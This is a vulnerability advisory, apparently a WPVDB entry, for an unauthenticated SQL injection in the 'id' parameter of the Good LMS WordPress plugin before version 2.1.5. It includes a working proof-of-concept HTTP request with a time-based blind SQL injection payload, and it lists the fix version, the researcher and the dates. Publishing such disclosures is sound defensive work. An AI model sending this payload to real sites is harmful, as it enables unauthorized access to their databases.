Good LMS < 2.1.5 - Unauthenticated SQL Injection

The Good LMS WordPress plugin was vulnerable to Unauthenticated SQL Injection in its 'id' parameter of the gdlr_lms_cancel_booking action.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1

action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)

Fixed in version 2.1.5✓

CVE

URL

ExploitDB

Type

SQLI

OWASP top 10

CWE

Original Researcher

Abdulazeez Alaseeri

Verified

WPVDB ID

Publicly Published

2020-11-12 (about 11 months ago)

Added

2020-11-12 (about 11 months ago)

Last Updated

2020-11-17 (about 11 months ago)